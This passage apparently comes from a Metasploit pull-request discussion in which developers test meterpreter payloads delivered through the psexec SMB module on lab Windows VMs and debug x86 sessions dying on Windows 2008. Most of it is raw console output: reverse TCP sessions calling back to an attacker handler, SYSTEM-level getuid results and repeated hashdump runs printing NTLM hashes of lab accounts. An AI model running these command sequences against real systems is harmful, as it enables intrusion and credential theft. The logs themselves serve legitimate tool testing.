sshd:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: sshd_server:1002:aad3b435b51404eeaad3b435b51404ee:8d0a16cfc061c3359db455d00ec27035::: vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: [*] Running 'hashdump' on meterpreter session 19 (10.5.134.150) Administrator:500:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: anakin_skywalker:1011:aad3b435b51404eeaad3b435b51404ee:c706f83a7b17a0230e55cde2f3de94fa::: artoo_detoo:1007:aad3b435b51404eeaad3b435b51404ee:fac6aada8b7afc418b3afea63b7577b4::: ben_kenobi:1009:aad3b435b51404eeaad3b435b51404ee:4fb77d816bce7aeee80d7c2e5e55c859::: boba_fett:1014:aad3b435b51404eeaad3b435b51404ee:d60f9a4859da4feadaf160e97d200dc9::: chewbacca:1017:aad3b435b51404eeaad3b435b51404ee:e7200536327ee731c7fe136af4575ed8::: c_three_pio:1008:aad3b435b51404eeaad3b435b51404ee:0fd2eb40c4aa690171ba066c037397ee::: darth_vader:1010:aad3b435b51404eeaad3b435b51404ee:b73a851f8ecff7acafbaa4a806aea3e0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: greedo:1016:aad3b435b51404eeaad3b435b51404ee:ce269c6b7d9e2f1522b44686b49082db::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: han_solo:1006:aad3b435b51404eeaad3b435b51404ee:33ed98c5969d05a7c15c25c99e3ef951::: jabba_hutt:1015:aad3b435b51404eeaad3b435b51404ee:93ec4eaa63d63565f37fe7f28d99ce76::: jarjar_binks:1012:aad3b435b51404eeaad3b435b51404ee:ec1dcd52077e75aef4a1930b0917c4d4::: kylo_ren:1018:aad3b435b51404eeaad3b435b51404ee:74c0a3dd06613d3240331e94ae18b001::: lando_calrissian:1013:aad3b435b51404eeaad3b435b51404ee:62708455898f2d7db11cfb670042a53f::: leia_organa:1004:aad3b435b51404eeaad3b435b51404ee:8ae6a810ce203621cf9cfa6f21f14028::: luke_skywalker:1005:aad3b435b51404eeaad3b435b51404ee:481e6150bde6998ed22b0e9bac82005a::: sshd:1002:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: sshd_server:1003:aad3b435b51404eeaad3b435b51404ee:8d0a16cfc061c3359db455d00ec27035::: vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:96811640642b7e8a6465a8d64208da82::: [*] Running 'hashdump' on meterpreter session 20 (10.5.134.151) Administrator:500:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: anakin_skywalker:1011:aad3b435b51404eeaad3b435b51404ee:c706f83a7b17a0230e55cde2f3de94fa::: artoo_detoo:1007:aad3b435b51404eeaad3b435b51404ee:fac6aada8b7afc418b3afea63b7577b4::: ben_kenobi:1009:aad3b435b51404eeaad3b435b51404ee:4fb77d816bce7aeee80d7c2e5e55c859::: boba_fett:1014:aad3b435b51404eeaad3b435b51404ee:d60f9a4859da4feadaf160e97d200dc9::: chewbacca:1017:aad3b435b51404eeaad3b435b51404ee:e7200536327ee731c7fe136af4575ed8::: c_three_pio:1008:aad3b435b51404eeaad3b435b51404ee:0fd2eb40c4aa690171ba066c037397ee::: darth_vader:1010:aad3b435b51404eeaad3b435b51404ee:b73a851f8ecff7acafbaa4a806aea3e0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: greedo:1016:aad3b435b51404eeaad3b435b51404ee:ce269c6b7d9e2f1522b44686b49082db::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: han_solo:1006:aad3b435b51404eeaad3b435b51404ee:33ed98c5969d05a7c15c25c99e3ef951::: jabba_hutt:1015:aad3b435b51404eeaad3b435b51404ee:93ec4eaa63d63565f37fe7f28d99ce76::: jarjar_binks:1012:aad3b435b51404eeaad3b435b51404ee:ec1dcd52077e75aef4a1930b0917c4d4::: kylo_ren:1018:aad3b435b51404eeaad3b435b51404ee:74c0a3dd06613d3240331e94ae18b001::: lando_calrissian:1013:aad3b435b51404eeaad3b435b51404ee:62708455898f2d7db11cfb670042a53f::: leia_organa:1004:aad3b435b51404eeaad3b435b51404ee:8ae6a810ce203621cf9cfa6f21f14028::: luke_skywalker:1005:aad3b435b51404eeaad3b435b51404ee:481e6150bde6998ed22b0e9bac82005a::: sshd:1002:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: sshd_server:1003:aad3b435b51404eeaad3b435b51404ee:8d0a16cfc061c3359db455d00ec27035::: vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:11ba4cb6993d434d8dbba9ba45fd9011::: [*] Running 'hashdump' on meterpreter session 21 (10.5.134.157) Administrator:500:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: anakin_skywalker:1011:aad3b435b51404eeaad3b435b51404ee:c706f83a7b17a0230e55cde2f3de94fa::: artoo_detoo:1007:aad3b435b51404eeaad3b435b51404ee:fac6aada8b7afc418b3afea63b7577b4::: ben_kenobi:1009:aad3b435b51404eeaad3b435b51404ee:4fb77d816bce7aeee80d7c2e5e55c859::: boba_fett:1014:aad3b435b51404eeaad3b435b51404ee:d60f9a4859da4feadaf160e97d200dc9::: chewbacca:1017:aad3b435b51404eeaad3b435b51404ee:e7200536327ee731c7fe136af4575ed8::: c_three_pio:1008:aad3b435b51404eeaad3b435b51404ee:0fd2eb40c4aa690171ba066c037397ee::: darth_vader:1010:aad3b435b51404eeaad3b435b51404ee:b73a851f8ecff7acafbaa4a806aea3e0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: greedo:1016:aad3b435b51404eeaad3b435b51404ee:ce269c6b7d9e2f1522b44686b49082db::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: han_solo:1006:aad3b435b51404eeaad3b435b51404ee:33ed98c5969d05a7c15c25c99e3ef951::: jabba_hutt:1015:aad3b435b51404eeaad3b435b51404ee:93ec4eaa63d63565f37fe7f28d99ce76::: jarjar_binks:1012:aad3b435b51404eeaad3b435b51404ee:ec1dcd52077e75aef4a1930b0917c4d4::: kylo_ren:1018:aad3b435b51404eeaad3b435b51404ee:74c0a3dd06613d3240331e94ae18b001::: lando_calrissian:1013:aad3b435b51404eeaad3b435b51404ee:62708455898f2d7db11cfb670042a53f::: leia_organa:1004:aad3b435b51404eeaad3b435b51404ee:8ae6a810ce203621cf9cfa6f21f14028::: luke_skywalker:1005:aad3b435b51404eeaad3b435b51404ee:481e6150bde6998ed22b0e9bac82005a::: sshd:1002:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: sshd_server:1003:aad3b435b51404eeaad3b435b51404ee:8d0a16cfc061c3359db455d00ec27035::: vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:7ee181ddb6556b468f3af0a9036cfa5f::: [*] Running 'hashdump' on meterpreter session 22 (10.5.134.171) Administrator:500:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: anakin_skywalker:1010:aad3b435b51404eeaad3b435b51404ee:c706f83a7b17a0230e55cde2f3de94fa::: artoo_detoo:1006:aad3b435b51404eeaad3b435b51404ee:fac6aada8b7afc418b3afea63b7577b4::: ben_kenobi:1008:aad3b435b51404eeaad3b435b51404ee:4fb77d816bce7aeee80d7c2e5e55c859::: boba_fett:1013:aad3b435b51404eeaad3b435b51404ee:d60f9a4859da4feadaf160e97d200dc9::: chewbacca:1016:aad3b435b51404eeaad3b435b51404ee:e7200536327ee731c7fe136af4575ed8::: c_three_pio:1007:aad3b435b51404eeaad3b435b51404ee:0fd2eb40c4aa690171ba066c037397ee::: darth_vader:1009:aad3b435b51404eeaad3b435b51404ee:b73a851f8ecff7acafbaa4a806aea3e0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: greedo:1015:aad3b435b51404eeaad3b435b51404ee:ce269c6b7d9e2f1522b44686b49082db::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: han_solo:1005:aad3b435b51404eeaad3b435b51404ee:33ed98c5969d05a7c15c25c99e3ef951::: jabba_hutt:1014:aad3b435b51404eeaad3b435b51404ee:93ec4eaa63d63565f37fe7f28d99ce76::: jarjar_binks:1011:aad3b435b51404eeaad3b435b51404ee:ec1dcd52077e75aef4a1930b0917c4d4::: kylo_ren:1017:aad3b435b51404eeaad3b435b51404ee:74c0a3dd06613d3240331e94ae18b001::: lando_calrissian:1012:aad3b435b51404eeaad3b435b51404ee:62708455898f2d7db11cfb670042a53f::: leia_organa:1003:aad3b435b51404eeaad3b435b51404ee:8ae6a810ce203621cf9cfa6f21f14028::: luke_skywalker:1004:aad3b435b51404eeaad3b435b51404ee:481e6150bde6998ed22b0e9bac82005a::: sshd:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: sshd_server:1002:aad3b435b51404eeaad3b435b51404ee:8d0a16cfc061c3359db455d00ec27035::: vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: [*] Running 'hashdump' on meterpreter session 23 (10.5.134.192) Administrator:500:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: anakin_skywalker:1011:aad3b435b51404eeaad3b435b51404ee:c706f83a7b17a0230e55cde2f3de94fa::: artoo_detoo:1007:aad3b435b51404eeaad3b435b51404ee:fac6aada8b7afc418b3afea63b7577b4::: ben_kenobi:1009:aad3b435b51404eeaad3b435b51404ee:4fb77d816bce7aeee80d7c2e5e55c859::: boba_fett:1014:aad3b435b51404eeaad3b435b51404ee:d60f9a4859da4feadaf160e97d200dc9::: chewbacca:1017:aad3b435b51404eeaad3b435b51404ee:e7200536327ee731c7fe136af4575ed8::: c_three_pio:1008:aad3b435b51404eeaad3b435b51404ee:0fd2eb40c4aa690171ba066c037397ee::: darth_vader:1010:aad3b435b51404eeaad3b435b51404ee:b73a851f8ecff7acafbaa4a806aea3e0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: greedo:1016:aad3b435b51404eeaad3b435b51404ee:ce269c6b7d9e2f1522b44686b49082db::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: han_solo:1006:aad3b435b51404eeaad3b435b51404ee:33ed98c5969d05a7c15c25c99e3ef951::: jabba_hutt:1015:aad3b435b51404eeaad3b435b51404ee:93ec4eaa63d63565f37fe7f28d99ce76::: jarjar_binks:1012:aad3b435b51404eeaad3b435b51404ee:ec1dcd52077e75aef4a1930b0917c4d4::: kylo_ren:1018:aad3b435b51404eeaad3b435b51404ee:74c0a3dd06613d3240331e94ae18b001::: lando_calrissian:1013:aad3b435b51404eeaad3b435b51404ee:62708455898f2d7db11cfb670042a53f::: leia_organa:1004:aad3b435b51404eeaad3b435b51404ee:8ae6a810ce203621cf9cfa6f21f14028::: luke_skywalker:1005:aad3b435b51404eeaad3b435b51404ee:481e6150bde6998ed22b0e9bac82005a::: sshd:1002:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: sshd_server:1003:aad3b435b51404eeaad3b435b51404ee:8d0a16cfc061c3359db455d00ec27035::: vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:6e8ef0961855a7312b15a5b80e73c29c::: msf6 exploit(windows/smb/psexec) > ```

bwatters-r7 commented 10 months ago

Not sure why, but it looks like x86 payloads are failing on Windows 2008x64. The x64 payloads work, and both work on 2008x64 R2.

🔴 Windows 2008x64 R1 WOW64

Windows 2008 x64 R1 ``` msf6 exploit(windows/smb/psexec) > run [*] Started reverse TCP handler on 10.5.135.201:4444 [*] 10.5.134.100:445 - Connecting to the server... [*] 10.5.134.100:445 - Authenticating to 10.5.134.100:445 as user 'Administrator'... [*] 10.5.134.100:445 - Selecting native target [!] 10.5.134.100:445 - peer_native_os is only available with SMB1 (current version: SMB2) [*] 10.5.134.100:445 - Uploading payload... TPqRyUvY.exe [*] 10.5.134.100:445 - Created \TPqRyUvY.exe... WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/metsrv.x86.dll is being used [*] Sending stage (185926 bytes) to 10.5.134.100 [+] 10.5.134.100:445 - Service started successfully... [*] 10.5.134.100:445 - Deleting \TPqRyUvY.exe... [*] 10.5.134.100 - Meterpreter session 24 closed. Reason: Died ^C[*] Exploit completed, but no session was created. msf6 exploit(windows/smb/psexec) > set payload windows/x64/me [-] Meterpreter session 24 is not valid and will be closed terpreter/reverse_tcp payload => windows/x64/meterpreter/reverse_tcp msf6 exploit(windows/smb/psexec) > run [*] Started reverse TCP handler on 10.5.135.201:4444 [*] 10.5.134.100:445 - Connecting to the server... [*] 10.5.134.100:445 - Authenticating to 10.5.134.100:445 as user 'Administrator'... [*] 10.5.134.100:445 - Selecting native target [!] 10.5.134.100:445 - peer_native_os is only available with SMB1 (current version: SMB2) [*] 10.5.134.100:445 - Uploading payload... HiEeaRtb.exe [*] 10.5.134.100:445 - Created \HiEeaRtb.exe... [+] 10.5.134.100:445 - Service started successfully... WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/metsrv.x64.dll is being used [*] 10.5.134.100:445 - Deleting \HiEeaRtb.exe... [*] Sending stage (290886 bytes) to 10.5.134.100 WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/ext_server_stdapi.x64.dll is being used WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/ext_server_priv.x64.dll is being used [*] Meterpreter session 25 opened (10.5.135.201:4444 -> 10.5.134.100:49160) at 2024-01-12 15:45:20 -0600 meterpreter > sysinfo Computer : WIN-2008X64 OS : Windows Server 2008 (6.0 Build 6001, Service Pack 1). Architecture : x64 System Language : en_US Domain : WORKGROUP Logged On Users : 1 Meterpreter : x64/windows meterpreter > exit [*] Shutting down session: 25 [*] 10.5.134.100 - Meterpreter session 25 closed. Reason: User exit msf6 exploit(windows/smb/psexec) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf6 exploit(windows/smb/psexec) > run [*] Started reverse TCP handler on 10.5.135.201:4444 [*] 10.5.134.100:445 - Connecting to the server... [*] 10.5.134.100:445 - Authenticating to 10.5.134.100:445 as user 'Administrator'... [*] 10.5.134.100:445 - Selecting native target [!] 10.5.134.100:445 - peer_native_os is only available with SMB1 (current version: SMB2) [*] 10.5.134.100:445 - Uploading payload... gExBWTtI.exe [*] 10.5.134.100:445 - Created \gExBWTtI.exe... [+] 10.5.134.100:445 - Service started successfully... WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/metsrv.x86.dll is being used [*] Sending stage (185926 bytes) to 10.5.134.100 [*] 10.5.134.100:445 - Deleting \gExBWTtI.exe... [*] 10.5.134.100 - Meterpreter session 26 closed. Reason: Died [-] Meterpreter session 26 is not valid and will be closed ``` Windows 2008 x64 R2 ``` msf6 exploit(windows/smb/psexec) > run [*] Started reverse TCP handler on 10.5.135.201:4444 [*] 10.5.134.185:445 - Connecting to the server... [*] 10.5.134.185:445 - Authenticating to 10.5.134.185:445 as user 'Administrator'... [*] 10.5.134.185:445 - Selecting PowerShell target [*] 10.5.134.185:445 - Executing the payload... [+] 10.5.134.185:445 - Service start timed out, OK if running a command or non-service executable... WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/metsrv.x86.dll is being used [*] Sending stage (185926 bytes) to 10.5.134.185 WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/ext_server_stdapi.x86.dll is being used WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/ext_server_priv.x86.dll is being used [*] Meterpreter session 27 opened (10.5.135.201:4444 -> 10.5.134.185:49158) at 2024-01-12 15:48:15 -0600 meterpreter > sysinfo Computer : WIN-HPUFI9UFNA7 OS : Windows Server 2008 R2 (6.1 Build 7601, Service Pack 1). Architecture : x64 System Language : en_US Domain : WORKGROUP Logged On Users : 1 Meterpreter : x86/windows meterpreter > getuid Server username: NT AUTHORITY\SYSTEM meterpreter > hashdump Administrator:500:aad3b435b51404eeaad3b435b51404ee:28c81ace30d1ccf5a8205506f782b73e::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: msfuser:1000:aad3b435b51404eeaad3b435b51404ee:28c81ace30d1ccf5a8205506f782b73e::: meterpreter > [*] 10.5.134.185 - Meterpreter session 27 closed. Reason: Died msf6 exploit(windows/smb/psexec) > set payload windows/x64/meterpreter/reverse_tcp payload => windows/x64/meterpreter/reverse_tcp msf6 exploit(windows/smb/psexec) > run [*] Started reverse TCP handler on 10.5.135.201:4444 [*] 10.5.134.185:445 - Connecting to the server... [*] 10.5.134.185:445 - Authenticating to 10.5.134.185:445 as user 'Administrator'... [*] 10.5.134.185:445 - Selecting PowerShell target [*] 10.5.134.185:445 - Executing the payload... [+] 10.5.134.185:445 - Service start timed out, OK if running a command or non-service executable... WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/metsrv.x64.dll is being used [*] Sending stage (290886 bytes) to 10.5.134.185 WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/ext_server_stdapi.x64.dll is being used WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/metsrv.x64.dll is being used [*] Sending stage (290886 bytes) to 10.5.134.185 WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/ext_server_priv.x64.dll is being used [*] Meterpreter session 28 opened (10.5.135.201:4444 -> 10.5.134.185:49160) at 2024-01-12 15:57:10 -0600 meterpreter > [*] Meterpreter session 29 opened (10.5.135.201:4444 -> 10.5.134.185:49159) at 2024-01-12 15:57:10 -0600 meterpreter > sysinfo Computer : WIN-HPUFI9UFNA7 OS : Windows Server 2008 R2 (6.1 Build 7601, Service Pack 1). Architecture : x64 System Language : en_US Domain : WORKGROUP Logged On Users : 1 Meterpreter : x64/windows meterpreter > getuid Server username: NT AUTHORITY\SYSTEM meterpreter > hashdump Administrator:500:aad3b435b51404eeaad3b435b51404ee:28c81ace30d1ccf5a8205506f782b73e::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: msfuser:1000:aad3b435b51404eeaad3b435b51404ee:28c81ace30d1ccf5a8205506f782b73e::: ```

cdelafuente-r7 commented 10 months ago

Thank you @bwatters-r7 for testing. I've updated the ReflectiveDLLInjection PR and updated the submodule here. this should be good now.

bwatters-r7 commented 10 months ago

:green_circle: Windows 10x64 x64/WOW64

``` msf6 exploit(windows/smb/psexec) > sessions -C sysinfo [*] Running 'sysinfo' on meterpreter session 1 (10.5.134.111) Computer : WIN10X64_1703 OS : Windows 10 (10.0 Build 15063). Architecture : x64 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x64/windows [*] Running 'sysinfo' on meterpreter session 2 (10.5.134.132) Computer : WIN10X64_1803 OS : Windows 10 (10.0 Build 17134). Architecture : x64 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x64/windows [*] Running 'sysinfo' on meterpreter session 3 (10.5.134.145) Computer : WIN10X64_1511 OS : Windows 10 (10.0 Build 10586). Architecture : x64 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x64/windows [*] Running 'sysinfo' on meterpreter session 4 (10.5.134.149) Computer : WIN10X64 OS : Windows 10 (10.0 Build 10240). Architecture : x64 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x64/windows [*] Running 'sysinfo' on meterpreter session 5 (10.5.134.150) Computer : WIN10X64_1709 OS : Windows 10 (10.0 Build 16299). Architecture : x64 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x64/windows [*] Running 'sysinfo' on meterpreter session 6 (10.5.134.151) Computer : WIN10X64_20H2 OS : Windows 10 (10.0 Build 19042). Architecture : x64 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x64/windows [*] Running 'sysinfo' on meterpreter session 7 (10.5.134.152) Computer : WIN10X64_1809 OS : Windows 10 (10.0 Build 17763). Architecture : x64 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x64/windows [*] Running 'sysinfo' on meterpreter session 8 (10.5.134.157) Computer : WIN10X64_2004 OS : Windows 10 (10.0 Build 19041). Architecture : x64 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x64/windows [*] Running 'sysinfo' on meterpreter session 9 (10.5.134.171) Computer : WIN10X64_1607 OS : Windows 10 (10.0 Build 14393). Architecture : x64 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x64/windows [*] Running 'sysinfo' on meterpreter session 10 (10.5.134.192) Computer : WIN10X64_21H1 OS : Windows 10 (10.0 Build 19043). Architecture : x64 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x64/windows [*] Running 'sysinfo' on meterpreter session 11 (10.5.134.111) Computer : WIN10X64_1703 OS : Windows 10 (10.0 Build 15063). Architecture : x64 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x86/windows [*] Running 'sysinfo' on meterpreter session 12 (10.5.134.132) Computer : WIN10X64_1803 OS : Windows 10 (10.0 Build 17134). Architecture : x64 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x86/windows [*] Running 'sysinfo' on meterpreter session 13 (10.5.134.145) Computer : WIN10X64_1511 OS : Windows 10 (10.0 Build 10586). Architecture : x64 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x86/windows [*] Running 'sysinfo' on meterpreter session 14 (10.5.134.149) Computer : WIN10X64 OS : Windows 10 (10.0 Build 10240). Architecture : x64 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x86/windows [*] Running 'sysinfo' on meterpreter session 15 (10.5.134.150) Computer : WIN10X64_1709 OS : Windows 10 (10.0 Build 16299). Architecture : x64 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x86/windows [*] Running 'sysinfo' on meterpreter session 16 (10.5.134.151) Computer : WIN10X64_20H2 OS : Windows 10 (10.0 Build 19042). Architecture : x64 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x86/windows [*] Running 'sysinfo' on meterpreter session 17 (10.5.134.157) Computer : WIN10X64_2004 OS : Windows 10 (10.0 Build 19041). Architecture : x64 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x86/windows [*] Running 'sysinfo' on meterpreter session 18 (10.5.134.171) Computer : WIN10X64_1607 OS : Windows 10 (10.0 Build 14393). Architecture : x64 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x86/windows [*] Running 'sysinfo' on meterpreter session 19 (10.5.134.192) Computer : WIN10X64_21H1 OS : Windows 10 (10.0 Build 19043). Architecture : x64 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x86/windows msf6 exploit(windows/smb/psexec) > sessions -C getuid [*] Running 'getuid' on meterpreter session 1 (10.5.134.111) Server username: NT AUTHORITY\SYSTEM [*] Running 'getuid' on meterpreter session 2 (10.5.134.132) Server username: NT AUTHORITY\SYSTEM [*] Running 'getuid' on meterpreter session 3 (10.5.134.145) Server username: NT AUTHORITY\SYSTEM [*] Running 'getuid' on meterpreter session 4 (10.5.134.149) Server username: NT AUTHORITY\SYSTEM [*] Running 'getuid' on meterpreter session 5 (10.5.134.150) Server username: NT AUTHORITY\SYSTEM [*] Running 'getuid' on meterpreter session 6 (10.5.134.151) Server username: NT AUTHORITY\SYSTEM [*] Running 'getuid' on meterpreter session 7 (10.5.134.152) Server username: NT AUTHORITY\SYSTEM [*] Running 'getuid' on meterpreter session 8 (10.5.134.157) Server username: NT AUTHORITY\SYSTEM [*] Running 'getuid' on meterpreter session 9 (10.5.134.171) Server username: NT AUTHORITY\SYSTEM [*] Running 'getuid' on meterpreter session 10 (10.5.134.192) Server username: NT AUTHORITY\SYSTEM [*] Running 'getuid' on meterpreter session 11 (10.5.134.111) Server username: NT AUTHORITY\SYSTEM [*] Running 'getuid' on meterpreter session 12 (10.5.134.132) Server username: NT AUTHORITY\SYSTEM [*] Running 'getuid' on meterpreter session 13 (10.5.134.145) Server username: NT AUTHORITY\SYSTEM [*] Running 'getuid' on meterpreter session 14 (10.5.134.149) Server username: NT AUTHORITY\SYSTEM [*] Running 'getuid' on meterpreter session 15 (10.5.134.150) Server username: NT AUTHORITY\SYSTEM [*] Running 'getuid' on meterpreter session 16 (10.5.134.151) Server username: NT AUTHORITY\SYSTEM [*] Running 'getuid' on meterpreter session 17 (10.5.134.157) Server username: NT AUTHORITY\SYSTEM [*] Running 'getuid' on meterpreter session 18 (10.5.134.171) Server username: NT AUTHORITY\SYSTEM [*] Running 'getuid' on meterpreter session 19 (10.5.134.192) Server username: NT AUTHORITY\SYSTEM msf6 exploit(windows/smb/psexec) > sessions -C hashdump [*] Running 'hashdump' on meterpreter session 1 (10.5.134.111) Administrator:500:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: anakin_skywalker:1011:aad3b435b51404eeaad3b435b51404ee:c706f83a7b17a0230e55cde2f3de94fa::: artoo_detoo:1007:aad3b435b51404eeaad3b435b51404ee:fac6aada8b7afc418b3afea63b7577b4::: ben_kenobi:1009:aad3b435b51404eeaad3b435b51404ee:4fb77d816bce7aeee80d7c2e5e55c859::: boba_fett:1014:aad3b435b51404eeaad3b435b51404ee:d60f9a4859da4feadaf160e97d200dc9::: chewbacca:1017:aad3b435b51404eeaad3b435b51404ee:e7200536327ee731c7fe136af4575ed8::: c_three_pio:1008:aad3b435b51404eeaad3b435b51404ee:0fd2eb40c4aa690171ba066c037397ee::: darth_vader:1010:aad3b435b51404eeaad3b435b51404ee:b73a851f8ecff7acafbaa4a806aea3e0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: greedo:1016:aad3b435b51404eeaad3b435b51404ee:ce269c6b7d9e2f1522b44686b49082db::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: han_solo:1006:aad3b435b51404eeaad3b435b51404ee:33ed98c5969d05a7c15c25c99e3ef951::: jabba_hutt:1015:aad3b435b51404eeaad3b435b51404ee:93ec4eaa63d63565f37fe7f28d99ce76::: jarjar_binks:1012:aad3b435b51404eeaad3b435b51404ee:ec1dcd52077e75aef4a1930b0917c4d4::: kylo_ren:1018:aad3b435b51404eeaad3b435b51404ee:74c0a3dd06613d3240331e94ae18b001::: lando_calrissian:1013:aad3b435b51404eeaad3b435b51404ee:62708455898f2d7db11cfb670042a53f::: leia_organa:1004:aad3b435b51404eeaad3b435b51404ee:8ae6a810ce203621cf9cfa6f21f14028::: luke_skywalker:1005:aad3b435b51404eeaad3b435b51404ee:481e6150bde6998ed22b0e9bac82005a::: sshd:1002:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: sshd_server:1003:aad3b435b51404eeaad3b435b51404ee:8d0a16cfc061c3359db455d00ec27035::: vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: [*] Running 'hashdump' on meterpreter session 2 (10.5.134.132) Administrator:500:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: anakin_skywalker:1011:aad3b435b51404eeaad3b435b51404ee:c706f83a7b17a0230e55cde2f3de94fa::: artoo_detoo:1007:aad3b435b51404eeaad3b435b51404ee:fac6aada8b7afc418b3afea63b7577b4::: ben_kenobi:1009:aad3b435b51404eeaad3b435b51404ee:4fb77d816bce7aeee80d7c2e5e55c859::: boba_fett:1014:aad3b435b51404eeaad3b435b51404ee:d60f9a4859da4feadaf160e97d200dc9::: chewbacca:1017:aad3b435b51404eeaad3b435b51404ee:e7200536327ee731c7fe136af4575ed8::: c_three_pio:1008:aad3b435b51404eeaad3b435b51404ee:0fd2eb40c4aa690171ba066c037397ee::: darth_vader:1010:aad3b435b51404eeaad3b435b51404ee:b73a851f8ecff7acafbaa4a806aea3e0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: greedo:1016:aad3b435b51404eeaad3b435b51404ee:ce269c6b7d9e2f1522b44686b49082db::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: han_solo:1006:aad3b435b51404eeaad3b435b51404ee:33ed98c5969d05a7c15c25c99e3ef951::: jabba_hutt:1015:aad3b435b51404eeaad3b435b51404ee:93ec4eaa63d63565f37fe7f28d99ce76::: jarjar_binks:1012:aad3b435b51404eeaad3b435b51404ee:ec1dcd52077e75aef4a1930b0917c4d4::: 